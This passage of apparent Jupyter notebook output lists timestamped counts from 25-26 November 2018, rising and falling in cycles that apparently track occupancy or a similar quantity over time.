"['2018-11-25 21:32:53', '0']\n",
"['2018-11-25 21:33:28', '0']\n",
"['2018-11-25 21:34:25', '1']\n",
"['2018-11-25 21:35:08', '1']\n",
"['2018-11-25 21:35:41', '1']\n",
"['2018-11-25 21:36:21', '1']\n",
"['2018-11-25 21:38:04', '1']\n",
"['2018-11-25 21:38:21', '1']\n",
"['2018-11-25 21:39:32', '1']\n",
"['2018-11-25 21:40:06', '1']\n",
"['2018-11-25 21:40:23', '1']\n",
"['2018-11-25 21:42:08', '1']\n",
"['2018-11-25 21:43:01', '1']\n",
"['2018-11-25 21:45:21', '10']\n",
"['2018-11-25 21:47:45', '10']\n",
"['2018-11-25 21:48:15', '10']\n",
"['2018-11-25 21:49:27', '11']\n",
"['2018-11-25 21:50:47', '14']\n",
"['2018-11-25 21:52:16', '18']\n",
"['2018-11-25 21:54:02', '18']\n",
"['2018-11-25 21:55:23', '18']\n",
"['2018-11-25 21:56:23', '17']\n",
"['2018-11-25 21:57:12', '16']\n",
"['2018-11-25 21:58:12', '16']\n",
"['2018-11-25 21:58:45', '15']\n",
"['2018-11-25 22:00:30', '6']\n",
"['2018-11-25 22:01:19', '5']\n",
"['2018-11-25 22:02:31', '5']\n",
"['2018-11-25 22:02:47', '4']\n",
"['2018-11-25 22:04:19', '2']\n",
"['2018-11-25 22:04:34', '2']\n",
"['2018-11-25 22:06:35', '2']\n",
"['2018-11-25 22:07:16', '2']\n",
"['2018-11-25 22:08:12', '2']\n",
"['2018-11-25 22:08:50', '2']\n",
"['2018-11-25 22:12:00', '2']\n",
"['2018-11-25 22:13:05', '0']\n",
"['2018-11-25 22:31:21', '3']\n",
"['2018-11-25 22:31:55', '8']\n",
"['2018-11-25 22:35:50', '8']\n",
"['2018-11-25 22:36:29', '8']\n",
"['2018-11-25 22:37:19', '8']\n",
"['2018-11-25 22:38:18', '8']\n",
"['2018-11-25 22:39:44', '8']\n",
"['2018-11-25 22:40:15', '8']\n",
"['2018-11-25 22:41:19', '8']\n",
"['2018-11-25 22:41:44', '8']\n",
"['2018-11-25 22:42:21', '8']\n",
"['2018-11-25 22:42:55', '8']\n",
"['2018-11-25 22:44:21', '8']\n",
"['2018-11-25 22:45:05', '7']\n",
"['2018-11-25 22:45:57', '6']\n",
"['2018-11-25 22:47:55', '6']\n",
"['2018-11-25 22:48:12', '6']\n",
"['2018-11-25 22:48:51', '6']\n",
"['2018-11-25 22:50:17', '10']\n",
"['2018-11-25 22:51:28', '10']\n",
"['2018-11-25 22:52:14', '10']\n",
"['2018-11-25 22:53:50', '9']\n",
"['2018-11-25 22:55:16', '8']\n",
"['2018-11-25 22:55:53', '8']\n",
"['2018-11-25 22:57:03', '0']\n",
"['2018-11-26 06:50:17', '2']\n",
"['2018-11-26 06:50:59', '3']\n",
"['2018-11-26 06:51:50', '4']\n",
"['2018-11-26 06:52:29', '5']\n",
"['2018-11-26 06:53:28', '5']\n",
"['2018-11-26 06:54:15', '6']\n",
"['2018-11-26 06:54:58', '6']\n",
"['2018-11-26 06:55:23', '7']\n",
"['2018-11-26 06:56:27', '7']\n",
"['2018-11-26 06:58:04', '7']\n",
"['2018-11-26 06:58:17', '7']\n",
"['2018-11-26 06:58:46', '8']\n",
"['2018-11-26 06:59:40', '8']\n",
"['2018-11-26 06:59:48', '9']\n",
"['2018-11-26 07:01:03', '9']\n",
"['2018-11-26 07:01:41', '9']\n",
"['2018-11-26 07:02:46', '12']\n",
"['2018-11-26 07:05:26', '12']\n",
"['2018-11-26 07:06:14', '13']\n",
"['2018-11-26 07:07:09', '17']\n",
"['2018-11-26 07:07:55', '16']\n",
"['2018-11-26 07:09:00', '16']\n",
"['2018-11-26 07:09:28', '16']\n",
"['2018-11-26 07:09:59', '18']\n",
"['2018-11-26 07:11:02', '19']\n",
"['2018-11-26 07:12:05', '19']\n",
"['2018-11-26 07:12:38', '19']\n",
"['2018-11-26 07:13:18', '22']\n",
"['2018-11-26 07:16:02', '22']\n",
"['2018-11-26 07:16:35', '22']\n",
"['2018-11-26 07:17:08', '22']\n",
"['2018-11-26 07:17:28', '22']\n",
"['2018-11-26 07:18:26', '22']\n",
"['2018-11-26 07:18:48', '22']\n",
"['2018-11-26 07:20:22', '22']\n",
"['2018-11-26 07:21:06', '22']\n",
"['2018-11-26 07:22:14', '22']\n",
"['2018-11-26 07:22:52', '22']\n",
"['2018-11-26 07:26:24', '13']\n",
"['2018-11-26 07:27:45', '0']\n",
"['2018-11-26 07:49:44', '5']\n",
"['2018-11-26 07:50:29', '8']\n",
"['2018-11-26 07:54:39', '8']\n",
"['2018-11-26 07:55:26', '8']\n",
"['2018-11-26 07:56:24', '8']\n",
"['2018-11-26 07:57:13', '8']\n",
"['2018-11-26 07:58:47', '8']\n",
"['2018-11-26 07:59:08', '10']\n",
"['2018-11-26 08:00:53', '13']\n",
"['2018-11-26 08:01:44', '14']\n",
"['2018-11-26 08:02:46', '15']\n",
"['2018-11-26 08:03:39', '18']\n",
"['2018-11-26 08:04:48', '19']\n",
"['2018-11-26 08:06:20', '19']\n",
"['2018-11-26 08:06:53', '17']\n",
"['2018-11-26 08:08:42', '20']\n",
"['2018-11-26 08:09:49', '20']\n",
"['2018-11-26 08:10:26', '19']\n",
"['2018-11-26 08:11:36', '20']\n",
"['2018-11-26 08:12:54', '18']\n",
"['2018-11-26 08:14:42', '16']\n",
"['2018-11-26 08:15:33', '15']\n",
"['2018-11-26 08:17:01', '14']\n",
"['2018-11-26 08:18:49', '14']\n",
"['2018-11-26 08:20:00', '17']\n",
"['2018-11-26 08:22:59', '18']\n",
"['2018-11-26 08:24:30', '18']\n",
"['2018-11-26 08:25:06', '19']\n",
"['2018-11-26 08:26:11', '19']\n",
"['2018-11-26 08:26:57', '19']\n",
"['2018-11-26 08:27:36', '19']\n",
"['2018-11-26 08:27:51', '17']\n",
"['2018-11-26 08:29:43', '17']\n",
"['2018-11-26 08:30:28', '15']\n",
"['2018-11-26 08:31:35', '10']\n",
"['2018-11-26 08:32:15', '13']\n",
"['2018-11-26 08:33:30', '13']\n",
"['2018-11-26 08:34:20', '8']\n",
"['2018-11-26 08:35:02', '7']\n",
"['2018-11-26 08:36:04', '2']\n",
"['2018-11-26 08:37:20', '2']\n",
"['2018-11-26 08:43:28', '2']\n",
"['2018-11-26 08:49:36', '0']\n",
"['2018-11-26 08:55:45', '8']\n",
"['2018-11-26 08:56:23', '10']\n",
"['2018-11-26 08:57:20', '12']\n",
"['2018-11-26 08:58:04', '15']\n",
"['2018-11-26 08:58:56', '16']\n",
"['2018-11-26 09:00:30', '19']\n",
"['2018-11-26 09:01:09', '20']\n",
"['2018-11-26 09:02:14', '24']\n",
"['2018-11-26 09:03:24', '24']\n",
"['2018-11-26 09:04:59', '27']\n",
"['2018-11-26 09:05:47', '27']\n",
"['2018-11-26 09:06:28', '34']\n",
"['2018-11-26 09:07:52', '36']\n",
"['2018-11-26 09:08:35', '36']\n",
"['2018-11-26 09:10:46', '36']\n",
"['2018-11-26 09:11:28', '35']\n",
"['2018-11-26 09:15:32', '69']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 09:18:39', '70']\n",
"['2018-11-26 09:20:19', '65']\n",
"['2018-11-26 09:22:02', '53']\n",
"['2018-11-26 09:23:51', '46']\n",
"['2018-11-26 09:25:30', '39']\n",
"['2018-11-26 09:26:51', '34']\n",
"['2018-11-26 09:27:56', '24']\n",
"['2018-11-26 09:29:32', '22']\n",
"['2018-11-26 09:30:26', '21']\n",
"['2018-11-26 09:31:51', '20']\n",
"['2018-11-26 09:33:04', '19']\n",
"['2018-11-26 09:36:35', '20']\n",
"['2018-11-26 09:37:48', '20']\n",
"['2018-11-26 09:38:39', '20']\n",
"['2018-11-26 09:38:52', '18']\n",
"['2018-11-26 09:40:02', '15']\n",
"['2018-11-26 09:41:04', '15']\n",
"['2018-11-26 09:42:10', '13']\n",
"['2018-11-26 09:43:11', '13']\n",
"['2018-11-26 09:44:22', '13']\n",
"['2018-11-26 09:44:50', '11']\n",
"['2018-11-26 09:46:47', '11']\n",
"['2018-11-26 09:47:35', '11']\n",
"['2018-11-26 09:47:57', '11']\n",
"['2018-11-26 09:48:29', '10']\n",
"['2018-11-26 09:53:04', '1']\n",
"['2018-11-26 09:54:16', '0']\n",
"['2018-11-26 09:55:42', '5']\n",
"['2018-11-26 09:57:09', '10']\n",
"['2018-11-26 09:58:36', '10']\n",
"['2018-11-26 10:00:03', '10']\n",
"['2018-11-26 10:01:30', '10']\n",
"['2018-11-26 10:02:57', '9']\n",
"['2018-11-26 10:04:24', '9']\n",
"['2018-11-26 10:05:51', '10']\n",
"['2018-11-26 10:07:18', '15']\n",
"['2018-11-26 10:08:45', '15']\n",
"['2018-11-26 10:10:12', '15']\n",
"['2018-11-26 10:11:38', '15']\n",
"['2018-11-26 10:13:05', '16']\n",
"['2018-11-26 10:14:32', '16']\n",
"['2018-11-26 10:15:59', '17']\n",
"['2018-11-26 10:17:26', '15']\n",
"['2018-11-26 10:18:53', '17']\n",
"['2018-11-26 10:20:20', '23']\n",
"['2018-11-26 10:21:47', '22']\n",
"['2018-11-26 10:23:14', '17']\n",
"['2018-11-26 10:24:41', '18']\n",
"['2018-11-26 10:26:08', '18']\n",
"['2018-11-26 10:27:34', '16']\n",
"['2018-11-26 10:29:01', '15']\n",
"['2018-11-26 10:30:28', '16']\n",
"['2018-11-26 10:31:55', '17']\n",
"['2018-11-26 10:33:22', '16']\n",
"['2018-11-26 10:34:49', '16']\n",
"['2018-11-26 10:36:16', '14']\n",
"['2018-11-26 10:37:43', '12']\n",
"['2018-11-26 10:39:10', '9']\n",
"['2018-11-26 10:40:37', '9']\n",
"['2018-11-26 10:42:04', '9']\n",
"['2018-11-26 10:43:30', '7']\n",
"['2018-11-26 10:44:57', '4']\n",
"['2018-11-26 10:46:24', '3']\n",
"['2018-11-26 10:47:51', '3']\n",
"['2018-11-26 10:49:18', '1']\n",
"['2018-11-26 10:50:45', '0']\n",
"['2018-11-26 10:52:12', '0']\n",
"['2018-11-26 10:53:39', '0']\n",
"['2018-11-26 10:55:06', '0']\n",
"['2018-11-26 10:56:33', '0']\n",
"['2018-11-26 10:58:00', '3']\n",
"['2018-11-26 10:58:35', '4']\n",
"['2018-11-26 10:59:31', '4']\n",
"['2018-11-26 10:59:42', '7']\n",
"['2018-11-26 11:00:42', '7']\n",
"['2018-11-26 11:02:02', '9']\n",
"['2018-11-26 11:02:07', '10']\n",
"['2018-11-26 11:03:00', '12']\n",
"['2018-11-26 11:04:10', '12']\n",
"['2018-11-26 11:05:42', '13']\n",
"['2018-11-26 11:06:25', '13']\n",
"['2018-11-26 11:07:10', '13']\n",
"['2018-11-26 11:07:30', '15']\n",
"['2018-11-26 11:08:15', '15']\n",
"['2018-11-26 11:10:13', '18']\n",
"['2018-11-26 11:11:34', '17']\n",
"['2018-11-26 11:15:02', '36']\n",
"['2018-11-26 11:17:40', '37']\n",
"['2018-11-26 11:19:24', '38']\n",
"['2018-11-26 11:21:00', '39']\n",
"['2018-11-26 11:23:03', '38']\n",
"['2018-11-26 11:24:31', '36']\n",
"['2018-11-26 11:25:36', '33']\n",
"['2018-11-26 11:27:28', '28']\n",
"['2018-11-26 11:28:51', '26']\n",
"['2018-11-26 11:29:59', '27']\n",
"['2018-11-26 11:31:39', '30']\n",
"['2018-11-26 11:32:39', '29']\n",
"['2018-11-26 11:34:37', '30']\n",
"['2018-11-26 11:35:27', '29']\n",
"['2018-11-26 11:36:33', '29']\n",
"['2018-11-26 11:36:48', '29']\n",
"['2018-11-26 11:37:59', '28']\n",
"['2018-11-26 11:39:04', '28']\n",
"['2018-11-26 11:40:20', '27']\n",
"['2018-11-26 11:41:20', '26']\n",
"['2018-11-26 11:42:40', '26']\n",
"['2018-11-26 11:43:10', '26']\n",
"['2018-11-26 11:45:08', '25']\n",
"['2018-11-26 11:46:24', '25']\n",
"['2018-11-26 11:46:43', '23']\n",
"['2018-11-26 11:47:45', '23']\n",
"['2018-11-26 11:52:57', '5']\n",
"['2018-11-26 11:54:10', '0']\n",
"['2018-11-26 11:55:37', '10']\n",
"['2018-11-26 11:57:05', '18']\n",
"['2018-11-26 11:58:33', '17']\n",
"['2018-11-26 12:00:01', '17']\n",
"['2018-11-26 12:01:28', '17']\n",
"['2018-11-26 12:02:56', '18']\n",
"['2018-11-26 12:04:24', '18']\n",
"['2018-11-26 12:05:52', '18']\n",
"['2018-11-26 12:07:20', '18']\n",
"['2018-11-26 12:08:47', '17']\n",
"['2018-11-26 12:10:15', '17']\n",
"['2018-11-26 12:11:43', '19']\n",
"['2018-11-26 12:13:11', '17']\n",
"['2018-11-26 12:14:39', '18']\n",
"['2018-11-26 12:16:06', '18']\n",
"['2018-11-26 12:17:34', '16']\n",
"['2018-11-26 12:19:02', '17']\n",
"['2018-11-26 12:20:30', '19']\n",
"['2018-11-26 12:21:58', '18']\n",
"['2018-11-26 12:23:25', '17']\n",
"['2018-11-26 12:24:53', '24']\n",
"['2018-11-26 12:26:21', '27']\n",
"['2018-11-26 12:27:49', '30']\n",
"['2018-11-26 12:29:17', '28']\n",
"['2018-11-26 12:30:44', '18']\n",
"['2018-11-26 12:32:12', '22']\n",
"['2018-11-26 12:33:40', '23']\n",
"['2018-11-26 12:35:08', '21']\n",
"['2018-11-26 12:36:36', '22']\n",
"['2018-11-26 12:38:03', '26']\n",
"['2018-11-26 12:39:31', '27']\n",
"['2018-11-26 12:40:59', '23']\n",
"['2018-11-26 12:42:27', '23']\n",
"['2018-11-26 12:43:55', '21']\n",
"['2018-11-26 12:45:22', '16']\n",
"['2018-11-26 12:46:50', '14']\n",
"['2018-11-26 12:48:18', '14']\n",
"['2018-11-26 12:49:46', '14']\n",
"['2018-11-26 12:51:14', '13']\n",
"['2018-11-26 12:52:41', '10']\n",
"['2018-11-26 12:54:09', '9']\n",
"['2018-11-26 12:55:37', '6']\n",
"['2018-11-26 12:57:05', '0']\n",
"['2018-11-26 12:58:33', '4']\n",
"['2018-11-26 12:59:14', '4']\n",
"['2018-11-26 12:59:34', '4']\n",
"['2018-11-26 13:00:15', '4']\n",
"['2018-11-26 13:00:50', '4']\n",
"['2018-11-26 13:02:04', '6']\n",
"['2018-11-26 13:02:16', '7']\n",
"['2018-11-26 13:02:43', '8']\n",
"['2018-11-26 13:03:48', '8']\n",
"['2018-11-26 13:05:34', '9']\n",
"['2018-11-26 13:06:17', '13']\n",
"['2018-11-26 13:06:55', '13']\n",
"['2018-11-26 13:08:14', '12']\n",
"['2018-11-26 13:08:58', '12']\n",
"['2018-11-26 13:09:42', '15']\n",
"['2018-11-26 13:11:01', '11']\n",
"['2018-11-26 13:15:09', '27']\n",
"['2018-11-26 13:16:57', '28']\n",
"['2018-11-26 13:18:20', '27']\n",
"['2018-11-26 13:19:19', '27']\n",
"['2018-11-26 13:21:33', '36']\n",
"['2018-11-26 13:23:25', '39']\n",
"['2018-11-26 13:25:20', '45']\n",
"['2018-11-26 13:26:30', '43']\n",
"['2018-11-26 13:27:34', '42']\n",
"['2018-11-26 13:28:42', '41']\n",
"['2018-11-26 13:30:14', '41']\n",
"['2018-11-26 13:31:20', '36']\n",
"['2018-11-26 13:32:51', '35']\n",
"['2018-11-26 13:33:49', '35']\n",
"['2018-11-26 13:34:21', '35']\n",
"['2018-11-26 13:34:39', '35']\n",
"['2018-11-26 13:35:22', '30']\n",
"['2018-11-26 13:36:15', '30']\n",
"['2018-11-26 13:37:33', '29']\n",
"['2018-11-26 13:38:38', '29']\n",
"['2018-11-26 13:39:29', '29']\n",
"['2018-11-26 13:40:00', '29']\n",
"['2018-11-26 13:41:31', '27']\n",
"['2018-11-26 13:42:50', '26']\n",
"['2018-11-26 13:43:36', '25']\n",
"['2018-11-26 13:44:48', '18']\n",
"['2018-11-26 13:49:50', '7']\n",
"['2018-11-26 13:51:09', '0']\n",
"['2018-11-26 13:52:50', '20']\n",
"['2018-11-26 13:54:31', '39']\n",
"['2018-11-26 13:56:12', '42']\n",
"['2018-11-26 13:57:54', '44']\n",
"['2018-11-26 13:59:35', '44']\n",
"['2018-11-26 14:01:16', '49']\n",
"['2018-11-26 14:02:57', '54']\n",
"['2018-11-26 14:04:39', '56']\n",
"['2018-11-26 14:06:20', '59']\n",
"['2018-11-26 14:08:01', '59']\n",
"['2018-11-26 14:09:42', '61']\n",
"['2018-11-26 14:11:24', '58']\n",
"['2018-11-26 14:13:05', '58']\n",
"['2018-11-26 14:14:46', '56']\n",
"['2018-11-26 14:16:27', '53']\n",
"['2018-11-26 14:18:09', '78']\n",
"['2018-11-26 14:19:50', '75']\n",
"['2018-11-26 14:21:31', '87']\n",
"['2018-11-26 14:23:12', '82']\n",
"['2018-11-26 14:24:54', '83']\n",
"['2018-11-26 14:26:35', '94']\n",
"['2018-11-26 14:28:16', '99']\n",
"['2018-11-26 14:29:57', '101']\n",
"['2018-11-26 14:31:39', '99']\n",
"['2018-11-26 14:33:20', '129']\n",
"['2018-11-26 14:35:01', '104']\n",
"['2018-11-26 14:36:42', '100']\n",
"['2018-11-26 14:38:24', '94']\n",
"['2018-11-26 14:40:05', '91']\n",
"['2018-11-26 14:41:46', '90']\n",
"['2018-11-26 14:43:27', '85']\n",
"['2018-11-26 14:45:09', '84']\n",
"['2018-11-26 14:46:50', '77']\n",
"['2018-11-26 14:48:31', '55']\n",
"['2018-11-26 14:50:12', '44']\n",
"['2018-11-26 14:51:54', '42']\n",
"['2018-11-26 14:53:35', '41']\n",
"['2018-11-26 14:55:16', '29']\n",
"['2018-11-26 14:56:57', '27']\n",
"['2018-11-26 14:58:39', '20']\n",
"['2018-11-26 15:00:20', '13']\n",
"['2018-11-26 15:02:01', '6']\n",
"['2018-11-26 15:03:42', '0']\n",
"['2018-11-26 15:05:24', '1']\n",
"['2018-11-26 15:07:32', '2']\n",
"['2018-11-26 15:08:16', '5']\n",
"['2018-11-26 15:08:52', '7']\n",
"['2018-11-26 15:09:33', '8']\n",
"['2018-11-26 15:10:38', '9']\n",
"['2018-11-26 15:11:09', '10']\n",
"['2018-11-26 15:11:59', '11']\n",
"['2018-11-26 15:12:59', '12']\n",
"['2018-11-26 15:14:39', '12']\n",
"['2018-11-26 15:14:51', '15']\n",
"['2018-11-26 15:15:21', '15']\n",
"['2018-11-26 15:16:45', '15']\n",
"['2018-11-26 15:16:53', '15']\n",
"['2018-11-26 15:18:26', '12']\n",
"['2018-11-26 15:19:45', '12']\n",
"['2018-11-26 15:21:00', '15']\n",
"['2018-11-26 15:23:37', '16']\n",
"['2018-11-26 15:25:13', '17']\n",
"['2018-11-26 15:27:02', '17']\n",
"['2018-11-26 15:27:40', '24']\n",
"['2018-11-26 15:29:26', '24']\n",
"['2018-11-26 15:30:19', '23']\n",
"['2018-11-26 15:31:37', '20']\n",
"['2018-11-26 15:33:28', '24']\n",
"['2018-11-26 15:34:32', '28']\n",
"['2018-11-26 15:35:34', '30']\n",
"['2018-11-26 15:37:58', '29']\n",
"['2018-11-26 15:40:40', '30']\n",
"['2018-11-26 15:41:23', '30']\n",
"['2018-11-26 15:42:24', '28']\n",
"['2018-11-26 15:42:37', '31']\n",
"['2018-11-26 15:43:42', '30']\n",
"['2018-11-26 15:44:22', '29']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 15:46:06', '31']\n",
"['2018-11-26 15:47:05', '31']\n",
"['2018-11-26 15:48:19', '28']\n",
"['2018-11-26 15:48:52', '22']\n",
"['2018-11-26 15:50:51', '19']\n",
"['2018-11-26 15:52:10', '13']\n",
"['2018-11-26 15:52:58', '8']\n",
"['2018-11-26 15:53:30', '6']\n",
"['2018-11-26 16:02:30', '0']\n",
"['2018-11-26 16:03:46', '0']\n",
"['2018-11-26 16:04:58', '8']\n",
"['2018-11-26 16:06:11', '13']\n",
"['2018-11-26 16:07:24', '16']\n",
"['2018-11-26 16:08:37', '16']\n",
"['2018-11-26 16:09:49', '22']\n",
"['2018-11-26 16:11:02', '22']\n",
"['2018-11-26 16:12:15', '23']\n",
"['2018-11-26 16:13:28', '21']\n",
"['2018-11-26 16:14:40', '21']\n",
"['2018-11-26 16:15:53', '19']\n",
"['2018-11-26 16:17:06', '20']\n",
"['2018-11-26 16:18:19', '23']\n",
"['2018-11-26 16:19:32', '22']\n",
"['2018-11-26 16:20:44', '28']\n",
"['2018-11-26 16:21:57', '28']\n",
"['2018-11-26 16:23:10', '24']\n",
"['2018-11-26 16:24:23', '26']\n",
"['2018-11-26 16:25:35', '28']\n",
"['2018-11-26 16:26:48', '32']\n",
"['2018-11-26 16:28:01', '32']\n",
"['2018-11-26 16:29:14', '31']\n",
"['2018-11-26 16:30:27', '28']\n",
"['2018-11-26 16:31:39', '27']\n",
"['2018-11-26 16:32:52', '30']\n",
"['2018-11-26 16:34:05', '28']\n",
"['2018-11-26 16:35:18', '28']\n",
"['2018-11-26 16:36:30', '26']\n",
"['2018-11-26 16:37:43', '25']\n",
"['2018-11-26 16:38:56', '29']\n",
"['2018-11-26 16:40:09', '25']\n",
"['2018-11-26 16:41:21', '28']\n",
"['2018-11-26 16:42:34', '27']\n",
"['2018-11-26 16:43:47', '27']\n",
"['2018-11-26 16:45:00', '25']\n",
"['2018-11-26 16:46:13', '21']\n",
"['2018-11-26 16:47:25', '22']\n",
"['2018-11-26 16:48:38', '25']\n",
"['2018-11-26 16:49:51', '20']\n",
"['2018-11-26 16:51:04', '17']\n",
"['2018-11-26 16:52:16', '13']\n",
"['2018-11-26 16:53:29', '13']\n",
"['2018-11-26 16:54:42', '0']\n",
"['2018-11-26 16:55:55', '0']\n",
"['2018-11-26 16:57:08', '5']\n",
"['2018-11-26 16:57:57', '7']\n",
"['2018-11-26 16:58:20', '9']\n",
"['2018-11-26 16:59:10', '9']\n",
"['2018-11-26 17:00:07', '10']\n",
"['2018-11-26 17:00:54', '10']\n",
"['2018-11-26 17:01:35', '8']\n",
"['2018-11-26 17:02:37', '12']\n",
"['2018-11-26 17:03:46', '12']\n",
"['2018-11-26 17:06:03', '17']\n",
"['2018-11-26 17:06:50', '17']\n",
"['2018-11-26 17:07:29', '17']\n",
"['2018-11-26 17:08:37', '16']\n",
"['2018-11-26 17:08:47', '15']\n",
"['2018-11-26 17:10:09', '16']\n",
"['2018-11-26 17:11:10', '14']\n",
"['2018-11-26 17:15:09', '16']\n",
"['2018-11-26 17:18:00', '16']\n",
"['2018-11-26 17:20:10', '17']\n",
"['2018-11-26 17:22:06', '18']\n",
"['2018-11-26 17:23:05', '20']\n",
"['2018-11-26 17:24:21', '20']\n",
"['2018-11-26 17:25:44', '17']\n",
"['2018-11-26 17:27:06', '18']\n",
"['2018-11-26 17:28:14', '18']\n",
"['2018-11-26 17:29:02', '18']\n",
"['2018-11-26 17:30:23', '14']\n",
"['2018-11-26 17:31:20', '15']\n",
"['2018-11-26 17:33:47', '17']\n",
"['2018-11-26 17:34:50', '17']\n",
"['2018-11-26 17:35:17', '21']\n",
"['2018-11-26 17:36:02', '17']\n",
"['2018-11-26 17:37:19', '18']\n",
"['2018-11-26 17:38:40', '11']\n",
"['2018-11-26 17:40:04', '9']\n",
"['2018-11-26 17:41:09', '7']\n",
"['2018-11-26 17:42:02', '7']\n",
"['2018-11-26 17:42:34', '7']\n",
"['2018-11-26 17:44:39', '7']\n",
"['2018-11-26 17:45:37', '7']\n",
"['2018-11-26 17:45:57', '7']\n",
"['2018-11-26 17:47:08', '7']\n",
"['2018-11-26 17:52:14', '4']\n",
"['2018-11-26 17:53:27', '0']\n",
"['2018-11-26 17:54:56', '4']\n",
"['2018-11-26 17:56:26', '7']\n",
"['2018-11-26 17:57:56', '7']\n",
"['2018-11-26 17:59:26', '9']\n",
"['2018-11-26 18:00:56', '13']\n",
"['2018-11-26 18:02:26', '11']\n",
"['2018-11-26 18:03:56', '14']\n",
"['2018-11-26 18:05:26', '11']\n",
"['2018-11-26 18:06:56', '15']\n",
"['2018-11-26 18:08:26', '15']\n",
"['2018-11-26 18:09:56', '16']\n",
"['2018-11-26 18:11:25', '16']\n",
"['2018-11-26 18:12:55', '16']\n",
"['2018-11-26 18:14:25', '18']\n",
"['2018-11-26 18:15:55', '19']\n",
"['2018-11-26 18:17:25', '14']\n",
"['2018-11-26 18:18:55', '19']\n",
"['2018-11-26 18:20:25', '13']\n",
"['2018-11-26 18:21:55', '11']\n",
"['2018-11-26 18:23:25', '12']\n",
"['2018-11-26 18:24:55', '13']\n",
"['2018-11-26 18:26:25', '13']\n",
"['2018-11-26 18:27:54', '12']\n",
"['2018-11-26 18:29:24', '12']\n",
"['2018-11-26 18:30:54', '13']\n",
"['2018-11-26 18:32:24', '13']\n",
"['2018-11-26 18:33:54', '15']\n",
"['2018-11-26 18:35:24', '12']\n",
"['2018-11-26 18:36:54', '15']\n",
"['2018-11-26 18:38:24', '15']\n",
"['2018-11-26 18:39:54', '13']\n",
"['2018-11-26 18:41:24', '14']\n",
"['2018-11-26 18:42:54', '13']\n",
"['2018-11-26 18:44:23', '16']\n",
"['2018-11-26 18:45:53', '14']\n",
"['2018-11-26 18:47:23', '14']\n",
"['2018-11-26 18:48:53', '14']\n",
"['2018-11-26 18:50:23', '14']\n",
"['2018-11-26 18:51:53', '11']\n",
"['2018-11-26 18:53:23', '8']\n",
"['2018-11-26 18:54:53', '3']\n",
"['2018-11-26 18:56:23', '0']\n",
"['2018-11-26 18:57:53', '0']\n",
"['2018-11-26 18:59:23', '6']\n",
"['2018-11-26 19:00:10', '11']\n",
"['2018-11-26 19:00:33', '14']\n",
"['2018-11-26 19:01:15', '14']\n",
"['2018-11-26 19:01:57', '18']\n",
"['2018-11-26 19:03:11', '20']\n",
"['2018-11-26 19:03:58', '19']\n",
"['2018-11-26 19:04:25', '20']\n",
"['2018-11-26 19:05:06', '20']\n",
"['2018-11-26 19:06:49', '24']\n",
"['2018-11-26 19:07:33', '26']\n",
"['2018-11-26 19:08:05', '22']\n",
"['2018-11-26 19:09:27', '25']\n",
"['2018-11-26 19:09:36', '25']\n",
"['2018-11-26 19:11:13', '26']\n",
"['2018-11-26 19:12:03', '26']\n",
"['2018-11-26 19:15:31', '22']\n",
"['2018-11-26 19:17:17', '23']\n",
"['2018-11-26 19:19:13', '21']\n",
"['2018-11-26 19:21:18', '21']\n",
"['2018-11-26 19:21:31', '18']\n",
"['2018-11-26 19:23:06', '17']\n",
"['2018-11-26 19:24:07', '16']\n",
"['2018-11-26 19:25:17', '14']\n",
"['2018-11-26 19:26:36', '13']\n",
"['2018-11-26 19:27:41', '12']\n",
"['2018-11-26 19:28:29', '10']\n",
"['2018-11-26 19:29:23', '11']\n",
"['2018-11-26 19:32:40', '12']\n",
"['2018-11-26 19:34:06', '12']\n",
"['2018-11-26 19:35:15', '14']\n",
"['2018-11-26 19:35:33', '12']\n",
"['2018-11-26 19:36:35', '15']\n",
"['2018-11-26 19:37:17', '15']\n",
"['2018-11-26 19:38:59', '16']\n",
"['2018-11-26 19:40:02', '13']\n",
"['2018-11-26 19:40:51', '13']\n",
"['2018-11-26 19:41:22', '13']\n",
"['2018-11-26 19:43:21', '13']\n",
"['2018-11-26 19:44:19', '6']\n",
"['2018-11-26 19:44:40', '6']\n",
"['2018-11-26 19:45:54', '6']\n",
"['2018-11-26 19:50:52', '0']\n",
"['2018-11-26 19:52:19', '0']\n",
"['2018-11-26 19:59:43', '11']\n",
"['2018-11-26 20:00:28', '18']\n",
"['2018-11-26 20:04:16', '24']\n",
"['2018-11-26 20:05:02', '24']\n",
"['2018-11-26 20:06:04', '29']\n",
"['2018-11-26 20:06:53', '34']\n",
"['2018-11-26 20:08:30', '39']\n",
"['2018-11-26 20:09:37', '43']\n",
"['2018-11-26 20:11:33', '46']\n",
"['2018-11-26 20:12:05', '42']\n",
"['2018-11-26 20:12:47', '42']\n",
"['2018-11-26 20:13:46', '42']\n",
"['2018-11-26 20:15:44', '41']\n",
"['2018-11-26 20:16:39', '43']\n",
"['2018-11-26 20:18:01', '43']\n",
"['2018-11-26 20:19:12', '46']\n",
"['2018-11-26 20:20:41', '51']\n",
"['2018-11-26 20:21:09', '52']\n",
"['2018-11-26 20:22:25', '54']\n",
"['2018-11-26 20:24:21', '48']\n",
"['2018-11-26 20:26:15', '50']\n",
"['2018-11-26 20:28:00', '51']\n",
"['2018-11-26 20:28:59', '51']\n",
"['2018-11-26 20:29:52', '55']\n",
"['2018-11-26 20:32:26', '47']\n",
"['2018-11-26 20:34:49', '44']\n",
"['2018-11-26 20:35:48', '44']\n",
"['2018-11-26 20:37:18', '44']\n",
"['2018-11-26 20:38:23', '46']\n",
"['2018-11-26 20:39:22', '41']\n",
"['2018-11-26 20:40:24', '43']\n",
"['2018-11-26 20:40:39', '34']\n",
"['2018-11-26 20:42:20', '33']\n",
"['2018-11-26 20:43:03', '28']\n",
"['2018-11-26 20:44:09', '31']\n",
"['2018-11-26 20:44:56', '29']\n",
"['2018-11-26 20:45:31', '29']\n",
"['2018-11-26 20:46:20', '23']\n",
"['2018-11-26 20:47:01', '18']\n",
"['2018-11-26 20:47:56', '10']\n",
"['2018-11-26 20:48:50', '0']\n",
"['2018-11-26 20:52:17', '0']\n",
"['2018-11-26 20:55:44', '0']\n",
"['2018-11-26 20:59:12', '6']\n",
"['2018-11-26 20:59:45', '7']\n",
"['2018-11-26 21:00:43', '9']\n",
"['2018-11-26 21:00:52', '9']\n",
"['2018-11-26 21:01:51', '12']\n",
"['2018-11-26 21:02:30', '12']\n",
"['2018-11-26 21:03:13', '14']\n",
"['2018-11-26 21:03:40', '16']\n",
"['2018-11-26 21:04:50', '16']\n",
"['2018-11-26 21:06:32', '19']\n",
"['2018-11-26 21:07:19', '19']\n",
"['2018-11-26 21:07:53', '21']\n",
